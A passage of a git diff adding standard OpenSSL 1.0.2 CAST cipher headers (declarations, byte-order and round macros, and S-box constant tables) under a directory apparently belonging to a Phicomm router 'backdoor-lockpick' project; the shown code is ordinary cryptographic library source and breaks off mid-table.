+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#ifndef HEADER_CAST_H
+# define HEADER_CAST_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+# include <openssl/opensslconf.h>
+
+# ifdef OPENSSL_NO_CAST
+#  error CAST is disabled.
+# endif
+
+# define CAST_ENCRYPT    1
+# define CAST_DECRYPT    0
+
+# define CAST_LONG unsigned int
+
+# define CAST_BLOCK      8
+# define CAST_KEY_LENGTH 16
+
+typedef struct cast_key_st {
+    CAST_LONG data[32];
+    int short_key;              /* Use reduced rounds for short key */
+} CAST_KEY;
+
+# ifdef OPENSSL_FIPS
+void private_CAST_set_key(CAST_KEY *key, int len, const unsigned char *data);
+# endif
+void CAST_set_key(CAST_KEY *key, int len, const unsigned char *data);
+void CAST_ecb_encrypt(const unsigned char *in, unsigned char *out,
+                      const CAST_KEY *key, int enc);
+void CAST_encrypt(CAST_LONG *data, const CAST_KEY *key);
+void CAST_decrypt(CAST_LONG *data, const CAST_KEY *key);
+void CAST_cbc_encrypt(const unsigned char *in, unsigned char *out,
+                      long length, const CAST_KEY *ks, unsigned char *iv,
+                      int enc);
+void CAST_cfb64_encrypt(const unsigned char *in, unsigned char *out,
+                        long length, const CAST_KEY *schedule,
+                        unsigned char *ivec, int *num, int enc);
+void CAST_ofb64_encrypt(const unsigned char *in, unsigned char *out,
+                        long length, const CAST_KEY *schedule,
+                        unsigned char *ivec, int *num);
+
+#ifdef  __cplusplus
+}
+#endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_lcl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_lcl.h
new file mode 100644
index 0000000..b0f0829
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_lcl.h
@@ -0,0 +1,227 @@
+/* crypto/cast/cast_lcl.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include "e_os.h"
+
+#ifdef OPENSSL_SYS_WIN32
+# include <stdlib.h>
+#endif
+
+#undef c2l
+#define c2l(c,l)        (l =((unsigned long)(*((c)++)))    , \
+                         l|=((unsigned long)(*((c)++)))<< 8L, \
+                         l|=((unsigned long)(*((c)++)))<<16L, \
+                         l|=((unsigned long)(*((c)++)))<<24L)
+
+/* NOTE - c is not incremented as per c2l */
+#undef c2ln
+#define c2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))<<24L; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<<16L; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<< 8L; \
+                        case 5: l2|=((unsigned long)(*(--(c))));     \
+                        case 4: l1 =((unsigned long)(*(--(c))))<<24L; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<<16L; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<< 8L; \
+                        case 1: l1|=((unsigned long)(*(--(c))));     \
+                                } \
+                        }
+
+#undef l2c
+#define l2c(l,c)        (*((c)++)=(unsigned char)(((l)     )&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>24L)&0xff))
+
+/* NOTE - c is not incremented as per l2c */
+#undef l2cn
+#define l2cn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)>>24L)&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>>16L)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>> 8L)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)     )&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)>>24L)&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>>16L)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>> 8L)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)     )&0xff); \
+                                } \
+                        }
+
+/* NOTE - c is not incremented as per n2l */
+#define n2ln(c,l1,l2,n) { \
+                        c+=n; \
+                        l1=l2=0; \
+                        switch (n) { \
+                        case 8: l2 =((unsigned long)(*(--(c))))    ; \
+                        case 7: l2|=((unsigned long)(*(--(c))))<< 8; \
+                        case 6: l2|=((unsigned long)(*(--(c))))<<16; \
+                        case 5: l2|=((unsigned long)(*(--(c))))<<24; \
+                        case 4: l1 =((unsigned long)(*(--(c))))    ; \
+                        case 3: l1|=((unsigned long)(*(--(c))))<< 8; \
+                        case 2: l1|=((unsigned long)(*(--(c))))<<16; \
+                        case 1: l1|=((unsigned long)(*(--(c))))<<24; \
+                                } \
+                        }
+
+/* NOTE - c is not incremented as per l2n */
+#define l2nn(l1,l2,c,n) { \
+                        c+=n; \
+                        switch (n) { \
+                        case 8: *(--(c))=(unsigned char)(((l2)    )&0xff); \
+                        case 7: *(--(c))=(unsigned char)(((l2)>> 8)&0xff); \
+                        case 6: *(--(c))=(unsigned char)(((l2)>>16)&0xff); \
+                        case 5: *(--(c))=(unsigned char)(((l2)>>24)&0xff); \
+                        case 4: *(--(c))=(unsigned char)(((l1)    )&0xff); \
+                        case 3: *(--(c))=(unsigned char)(((l1)>> 8)&0xff); \
+                        case 2: *(--(c))=(unsigned char)(((l1)>>16)&0xff); \
+                        case 1: *(--(c))=(unsigned char)(((l1)>>24)&0xff); \
+                                } \
+                        }
+
+#undef n2l
+#define n2l(c,l)        (l =((unsigned long)(*((c)++)))<<24L, \
+                         l|=((unsigned long)(*((c)++)))<<16L, \
+                         l|=((unsigned long)(*((c)++)))<< 8L, \
+                         l|=((unsigned long)(*((c)++))))
+
+#undef l2n
+#define l2n(l,c)        (*((c)++)=(unsigned char)(((l)>>24L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>>16L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)>> 8L)&0xff), \
+                         *((c)++)=(unsigned char)(((l)     )&0xff))
+
+#if defined(OPENSSL_SYS_WIN32) && defined(_MSC_VER)
+# define ROTL(a,n)     (_lrotl(a,n))
+#elif defined(PEDANTIC)
+# define ROTL(a,n)     ((((a)<<(n))&0xffffffffL)|((a)>>((32-(n))&31)))
+#else
+# define ROTL(a,n)     ((((a)<<(n))&0xffffffffL)|((a)>>(32-(n))))
+#endif
+
+#define C_M    0x3fc
+#define C_0    22L
+#define C_1    14L
+#define C_2     6L
+#define C_3     2L              /* left shift */
+
+/* The rotate has an extra 16 added to it to help the x86 asm */
+#if defined(CAST_PTR)
+# define E_CAST(n,key,L,R,OP1,OP2,OP3) \
+        { \
+        int i; \
+        t=(key[n*2] OP1 R)&0xffffffffL; \
+        i=key[n*2+1]; \
+        t=ROTL(t,i); \
+        L^= (((((*(CAST_LONG *)((unsigned char *) \
+                        CAST_S_table0+((t>>C_2)&C_M)) OP2 \
+                *(CAST_LONG *)((unsigned char *) \
+                        CAST_S_table1+((t<<C_3)&C_M)))&0xffffffffL) OP3 \
+                *(CAST_LONG *)((unsigned char *) \
+                        CAST_S_table2+((t>>C_0)&C_M)))&0xffffffffL) OP1 \
+                *(CAST_LONG *)((unsigned char *) \
+                        CAST_S_table3+((t>>C_1)&C_M)))&0xffffffffL; \
+        }
+#elif defined(CAST_PTR2)
+# define E_CAST(n,key,L,R,OP1,OP2,OP3) \
+        { \
+        int i; \
+        CAST_LONG u,v,w; \
+        w=(key[n*2] OP1 R)&0xffffffffL; \
+        i=key[n*2+1]; \
+        w=ROTL(w,i); \
+        u=w>>C_2; \
+        v=w<<C_3; \
+        u&=C_M; \
+        v&=C_M; \
+        t= *(CAST_LONG *)((unsigned char *)CAST_S_table0+u); \
+        u=w>>C_0; \
+        t=(t OP2 *(CAST_LONG *)((unsigned char *)CAST_S_table1+v))&0xffffffffL;\
+        v=w>>C_1; \
+        u&=C_M; \
+        v&=C_M; \
+        t=(t OP3 *(CAST_LONG *)((unsigned char *)CAST_S_table2+u)&0xffffffffL);\
+        t=(t OP1 *(CAST_LONG *)((unsigned char *)CAST_S_table3+v)&0xffffffffL);\
+        L^=(t&0xffffffff); \
+        }
+#else
+# define E_CAST(n,key,L,R,OP1,OP2,OP3) \
+        { \
+        CAST_LONG a,b,c,d; \
+        t=(key[n*2] OP1 R)&0xffffffff; \
+        t=ROTL(t,(key[n*2+1])); \
+        a=CAST_S_table0[(t>> 8)&0xff]; \
+        b=CAST_S_table1[(t    )&0xff]; \
+        c=CAST_S_table2[(t>>24)&0xff]; \
+        d=CAST_S_table3[(t>>16)&0xff]; \
+        L^=(((((a OP2 b)&0xffffffffL) OP3 c)&0xffffffffL) OP1 d)&0xffffffffL; \
+        }
+#endif
+
+extern const CAST_LONG CAST_S_table0[256];
+extern const CAST_LONG CAST_S_table1[256];
+extern const CAST_LONG CAST_S_table2[256];
+extern const CAST_LONG CAST_S_table3[256];
+extern const CAST_LONG CAST_S_table4[256];
+extern const CAST_LONG CAST_S_table5[256];
+extern const CAST_LONG CAST_S_table6[256];
+extern const CAST_LONG CAST_S_table7[256];
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_s.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_s.h
new file mode 100644
index 0000000..380dc81
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/cast/cast_s.h
@@ -0,0 +1,592 @@
+/* crypto/cast/cast_s.h */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+OPENSSL_GLOBAL const CAST_LONG CAST_S_table0[256] = {
+    0x30fb40d4, 0x9fa0ff0b, 0x6beccd2f, 0x3f258c7a,
+    0x1e213f2f, 0x9c004dd3, 0x6003e540, 0xcf9fc949,
+    0xbfd4af27, 0x88bbbdb5, 0xe2034090, 0x98d09675,
+    0x6e63a0e0, 0x15c361d2, 0xc2e7661d, 0x22d4ff8e,
+    0x28683b6f, 0xc07fd059, 0xff2379c8, 0x775f50e2,
+    0x43c340d3, 0xdf2f8656, 0x887ca41a, 0xa2d2bd2d,
+    0xa1c9e0d6, 0x346c4819, 0x61b76d87, 0x22540f2f,
+    0x2abe32e1, 0xaa54166b, 0x22568e3a, 0xa2d341d0,
+    0x66db40c8, 0xa784392f, 0x004dff2f, 0x2db9d2de,
+    0x97943fac, 0x4a97c1d8, 0x527644b7, 0xb5f437a7,
+    0xb82cbaef, 0xd751d159, 0x6ff7f0ed, 0x5a097a1f,
+    0x827b68d0, 0x90ecf52e, 0x22b0c054, 0xbc8e5935,
+    0x4b6d2f7f, 0x50bb64a2, 0xd2664910, 0xbee5812d,
+    0xb7332290, 0xe93b159f, 0xb48ee411, 0x4bff345d,
+    0xfd45c240, 0xad31973f, 0xc4f6d02e, 0x55fc8165,
+    0xd5b1caad, 0xa1ac2dae, 0xa2d4b76d, 0xc19b0c50,
+    0x882240f2, 0x0c6e4f38, 0xa4e4bfd7, 0x4f5ba272,
+    0x564c1d2f, 0xc59c5319, 0xb949e354, 0xb04669fe,
+    0xb1b6ab8a, 0xc71358dd, 0x6385c545, 0x110f935d,
+    0x57538ad5, 0x6a390493, 0xe63d37e0, 0x2a54f6b3,
+    0x3a787d5f, 0x6276a0b5, 0x19a6fcdf, 0x7a42206a,
+    0x29f9d4d5, 0xf61b1891, 0xbb72275e, 0xaa508167,
+    0x38901091, 0xc6b505eb, 0x84c7cb8c, 0x2ad75a0f,
+    0x874a1427, 0xa2d1936b, 0x2ad286af, 0xaa56d291,
+    0xd7894360, 0x425c750d, 0x93b39e26, 0x187184c9,
+    0x6c00b32d, 0x73e2bb14, 0xa0bebc3c, 0x54623779,
+    0x64459eab, 0x3f328b82, 0x7718cf82, 0x59a2cea6,
+    0x04ee002e, 0x89fe78e6, 0x3fab0950, 0x325ff6c2,
+    0x81383f05, 0x6963c5c8, 0x76cb5ad6, 0xd49974c9,
+    0xca180dcf, 0x380782d5, 0xc7fa5cf6, 0x8ac31511,
+    0x35e79e13, 0x47da91d0, 0xf40f9086, 0xa7e2419e,
+    0x31366241, 0x051ef495, 0xaa573b04, 0x4a805d8d,
+    0x548300d0, 0x00322a3c, 0xbf64cddf, 0xba57a68e,
+    0x75c6372b, 0x50afd341, 0xa7c13275, 0x915a0bf5,
+    0x6b54bfab, 0x2b0b1426, 0xab4cc9d7, 0x449ccd82,
+    0xf7fbf265, 0xab85c5f3, 0x1b55db94, 0xaad4e324,
+    0xcfa4bd3f, 0x2deaa3e2, 0x9e204d02, 0xc8bd25ac,
+    0xeadf55b3, 0xd5bd9e98, 0xe31231b2, 0x2ad5ad6c,
+    0x954329de, 0xadbe4528, 0xd8710f69, 0xaa51c90f,
+    0xaa786bf6, 0x22513f1e, 0xaa51a79b, 0x2ad344cc,
+    0x7b5a41f0, 0xd37cfbad, 0x1b069505, 0x41ece491,
+    0xb4c332e6, 0x032268d4, 0xc9600acc, 0xce387e6d,
+    0xbf6bb16c, 0x6a70fb78, 0x0d03d9c9, 0xd4df39de,
+    0xe01063da, 0x4736f464, 0x5ad328d8, 0xb347cc96,
+    0x75bb0fc3, 0x98511bfb, 0x4ffbcc35, 0xb58bcf6a,
+    0xe11f0abc, 0xbfc5fe4a, 0xa70aec10, 0xac39570a,
+    0x3f04442f, 0x6188b153, 0xe0397a2e, 0x5727cb79,
+    0x9ceb418f, 0x1cacd68d, 0x2ad37c96, 0x0175cb9d,
+    0xc69dff09, 0xc75b65f0, 0xd9db40d8, 0xec0e7779,
+    0x4744ead4, 0xb11c3274, 0xdd24cb9e, 0x7e1c54bd,
+    0xf01144f9, 0xd2240eb1, 0x9675b3fd, 0xa3ac3755,
+    0xd47c27af, 0x51c85f4d, 0x56907596, 0xa5bb15e6,
+    0x580304f0, 0xca042cf1, 0x011a37ea, 0x8dbfaadb,
+    0x35ba3e4a, 0x3526ffa0, 0xc37b4d09, 0xbc306ed9,
+    0x98a52666, 0x5648f725, 0xff5e569d, 0x0ced63d0,
+    0x7c63b2cf, 0x700b45e1, 0xd5ea50f1, 0x85a92872,
+    0xaf1fbda7, 0xd4234870, 0xa7870bf3, 0x2d3b4d79,
+    0x42e04198, 0x0cd0ede7, 0x26470db8, 0xf881814c,
+    0x474d6ad7, 0x7c0c5e5c, 0xd1231959, 0x381b7298,
+    0xf5d2f4db, 0xab838653, 0x6e2f1e23, 0x83719c9e,
+    0xbd91e046, 0x9a56456e, 0xdc39200c, 0x20c8c571,
+    0x962bda1c, 0xe1e696ff, 0xb141ab08, 0x7cca89b9,
+    0x1a69e783, 0x02cc4843, 0xa2f7c579, 0x429ef47d,
+    0x427b169c, 0x5ac9f049, 0xdd8f0f00, 0x5c8165bf,
+};
+
+OPENSSL_GLOBAL const CAST_LONG CAST_S_table1[256] = {
+    0x1f201094, 0xef0ba75b, 0x69e3cf7e, 0x393f4380,
+    0xfe61cf7a, 0xeec5207a, 0x55889c94, 0x72fc0651,
+    0xada7ef79, 0x4e1d7235, 0xd55a63ce, 0xde0436ba,
+    0x99c430ef, 0x5f0c0794, 0x18dcdb7d, 0xa1d6eff3,
+    0xa0b52f7b, 0x59e83605, 0xee15b094, 0xe9ffd909,
+    0xdc440086, 0xef944459, 0xba83ccb3, 0xe0c3cdfb,
+    0xd1da4181, 0x3b092ab1, 0xf997f1c1, 0xa5e6cf7b,
+    0x01420ddb, 0xe4e7ef5b, 0x25a1ff41, 0xe180f806,
+    0x1fc41080, 0x179bee7a, 0xd37ac6a9, 0xfe5830a4,
+    0x98de8b7f, 0x77e83f4e, 0x79929269, 0x24fa9f7b,
+    0xe113c85b, 0xacc40083, 0xd7503525, 0xf7ea615f,
+    0x62143154, 0x0d554b63, 0x5d681121, 0xc866c359,
+    0x3d63cf73, 0xcee234c0, 0xd4d87e87, 0x5c672b21,
+    0x071f6181, 0x39f7627f, 0x361e3084, 0xe4eb573b,
+    0x602f64a4, 0xd63acd9c, 0x1bbc4635, 0x9e81032d,
+    0x2701f50c, 0x99847ab4, 0xa0e3df79, 0xba6cf38c,
+    0x10843094, 0x2537a95e, 0xf46f6ffe, 0xa1ff3b1f,
+    0x208cfb6a, 0x8f458c74, 0xd9e0a227, 0x4ec73a34,
+    0xfc884f69, 0x3e4de8df, 0xef0e0088, 0x3559648d,
+    0x8a45388c, 0x1d804366, 0x721d9bfd, 0xa58684bb,
+    0xe8256333, 0x844e8212, 0x128d8098, 0xfed33fb4,
+    0xce280ae1, 0x27e19ba5, 0xd5a6c252, 0xe49754bd,
+    0xc5d655dd, 0xeb667064, 0x77840b4d, 0xa1b6a801,
+    0x84db26a9, 0xe0b56714, 0x21f043b7, 0xe5d05860,
+    0x54f03084, 0x066ff472, 0xa31aa153, 0xdadc4755,
+    0xb5625dbf, 0x68561be6, 0x83ca6b94, 0x2d6ed23b,
+    0xeccf01db, 0xa6d3d0ba, 0xb6803d5c, 0xaf77a709,
+    0x33b4a34c, 0x397bc8d6, 0x5ee22b95, 0x5f0e5304,
+    0x81ed6f61, 0x20e74364, 0xb45e1378, 0xde18639b,
+    0x881ca122, 0xb96726d1, 0x8049a7e8, 0x22b7da7b,
+    0x5e552d25, 0x5272d237, 0x79d2951c, 0xc60d894c,
+    0x488cb402, 0x1ba4fe5b, 0xa4b09f6b, 0x1ca815cf,
+    0xa20c3005, 0x8871df63, 0xb9de2fcb, 0x0cc6c9e9,
+    0x0beeff53, 0xe3214517, 0xb4542835, 0x9f63293c,
+    0xee41e729, 0x6e1d2d7c, 0x50045286, 0x1e6685f3,
+    0xf33401c6, 0x30a22c95, 0x31a70850, 0x60930f13,
+    0x73f98417, 0xa1269859, 0xec645c44, 0x52c877a9,
+    0xcdff33a6, 0xa02b1741, 0x7cbad9a2, 0x2180036f,
+    0x50d99c08, 0xcb3f4861, 0xc26bd765, 0x64a3f6ab,
+    0x80342676, 0x25a75e7b, 0xe4e6d1fc, 0x20c710e6,
+    0xcdf0b680, 0x17844d3b, 0x31eef84d, 0x7e0824e4,
+    0x2ccb49eb, 0x846a3bae, 0x8ff77888, 0xee5d60f6,
+    0x7af75673, 0x2fdd5cdb, 0xa11631c1, 0x30f66f43,
+    0xb3faec54, 0x157fd7fa, 0xef8579cc, 0xd152de58,
+    0xdb2ffd5e, 0x8f32ce19, 0x306af97a, 0x02f03ef8,
+    0x99319ad5, 0xc242fa0f, 0xa7e3ebb0, 0xc68e4906,
+    0xb8da230c, 0x80823028, 0xdcdef3c8, 0xd35fb171,
+    0x088a1bc8, 0xbec0c560, 0x61a3c9e8, 0xbca8f54d,
+    0xc72feffa, 0x22822e99, 0x82c570b4, 0xd8d94e89,
+    0x8b1c34bc, 0x301e16e6, 0x273be979, 0xb0ffeaa6,
+    0x61d9b8c6, 0x00b24869, 0xb7ffce3f, 0x08dc283b,
+    0x43daf65a, 0xf7e19798, 0x7619b72f, 0x8f1c9ba4,
+    0xdc8637a0, 0x16a7d3b1, 0x9fc393b7, 0xa7136eeb,
+    0xc6bcc63e, 0x1a513742, 0xef6828bc, 0x520365d6,
+    0x2d6a77ab, 0x3527ed4b, 0x821fd216, 0x095c6e2e,
+    0xdb92f2fb, 0x5eea29cb, 0x145892f5, 0x91584f7f,
+    0x5483697b, 0x2667a8cc, 0x85196048, 0x8c4bacea,
+    0x833860d4, 0x0d23e0f9, 0x6c387e8a, 0x0ae6d249,
+    0xb284600c, 0xd835731d, 0xdcb1c647, 0xac4c56ea,
+    0x3ebd81b3, 0x230eabb0, 0x6438bc87, 0xf0b5b1fa,
+    0x8f5ea2b3, 0xfc184642, 0x0a036b7a, 0x4fb089bd,
+    0x649da589, 0xa345415e, 0x5c038323, 0x3e5d3bb9,
+    0x43d79572, 0x7e6dd07c, 0x06dfdf1e, 0x6c6cc4ef,
+    0x7160a539, 0x73bfbe70, 0x83877605, 0x4523ecf1,
+};
+
+OPENSSL_GLOBAL const CAST_LONG CAST_S_table2[256] = {
+    0x8defc240, 0x25fa5d9f, 0xeb903dbf, 0xe810c907,
+    0x47607fff, 0x369fe44b, 0x8c1fc644, 0xaececa90,
+    0xbeb1f9bf, 0xeefbcaea, 0xe8cf1950, 0x51df07ae,
+    0x920e8806, 0xf0ad0548, 0xe13c8d83, 0x927010d5,
+    0x11107d9f, 0x07647db9, 0xb2e3e4d4, 0x3d4f285e,
+    0xb9afa820, 0xfade82e0, 0xa067268b, 0x8272792e,
+    0x553fb2c0, 0x489ae22b, 0xd4ef9794, 0x125e3fbc,
+    0x21fffcee, 0x825b1bfd, 0x9255c5ed, 0x1257a240,
+    0x4e1a8302, 0xbae07fff, 0x528246e7, 0x8e57140e,
+    0x3373f7bf, 0x8c9f8188, 0xa6fc4ee8, 0xc982b5a5,
+    0xa8c01db7, 0x579fc264, 0x67094f31, 0xf2bd3f5f,
+    0x40fff7c1, 0x1fb78dfc, 0x8e6bd2c1, 0x437be59b,
+    0x99b03dbf, 0xb5dbc64b, 0x638dc0e6, 0x55819d99,
+    0xa197c81c, 0x4a012d6e, 0xc5884a28, 0xccc36f71,
+    0xb843c213, 0x6c0743f1, 0x8309893c, 0x0feddd5f,
+    0x2f7fe850, 0xd7c07f7e, 0x02507fbf, 0x5afb9a04,
+    0xa747d2d0, 0x1651192e, 0xaf70bf3e, 0x58c31380,
+    0x5f98302e, 0x727cc3c4, 0x0a0fb402, 0x0f7fef82,
+    0x8c96fdad, 0x5d2c2aae, 0x8ee99a49, 0x50da88b8,
+    0x8427f4a0, 0x1eac5790, 0x796fb449, 0x8252dc15,
+    0xefbd7d9b, 0xa672597d, 0xada840d8, 0x45f54504,
+    0xfa5d7403, 0xe83ec305, 0x4f91751a, 0x925669c2,
+    0x23efe941, 0xa903f12e, 0x60270df2, 0x0276e4b6,
+    0x94fd6574, 0x927985b2, 0x8276dbcb, 0x02778176,
+    0xf8af918d, 0x4e48f79e, 0x8f616ddf, 0xe29d840e,
+    0x842f7d83, 0x340ce5c8, 0x96bbb682, 0x93b4b148,
+    0xef303cab, 0x984faf28, 0x779faf9b, 0x92dc560d,
+    0x224d1e20, 0x8437aa88, 0x7d29dc96, 0x2756d3dc,
+    0x8b907cee, 0xb51fd240, 0xe7c07ce3, 0xe566b4a1,
+    0xc3e9615e, 0x3cf8209d, 0x6094d1e3, 0xcd9ca341,
+    0x5c76460e, 0x00ea983b, 0xd4d67881, 0xfd47572c,
+    0xf76cedd9, 0xbda8229c, 0x127dadaa, 0x438a074e,
+    0x1f97c090, 0x081bdb8a, 0x93a07ebe, 0xb938ca15,
+    0x97b03cff, 0x3dc2c0f8, 0x8d1ab2ec, 0x64380e51,
+    0x68cc7bfb, 0xd90f2788, 0x12490181, 0x5de5ffd4,
+    0xdd7ef86a, 0x76a2e214, 0xb9a40368, 0x925d958f,
+    0x4b39fffa, 0xba39aee9, 0xa4ffd30b, 0xfaf7933b,
+    0x6d498623, 0x193cbcfa, 0x27627545, 0x825cf47a,
+    0x61bd8ba0, 0xd11e42d1, 0xcead04f4, 0x127ea392,
+    0x10428db7, 0x8272a972, 0x9270c4a8, 0x127de50b,
+    0x285ba1c8, 0x3c62f44f, 0x35c0eaa5, 0xe805d231,
+    0x428929fb, 0xb4fcdf82, 0x4fb66a53, 0x0e7dc15b,
+    0x1f081fab, 0x108618ae, 0xfcfd086d, 0xf9ff2889,
+    0x694bcc11, 0x236a5cae, 0x12deca4d, 0x2c3f8cc5,
+    0xd2d02dfe, 0xf8ef5896, 0xe4cf52da, 0x95155b67,
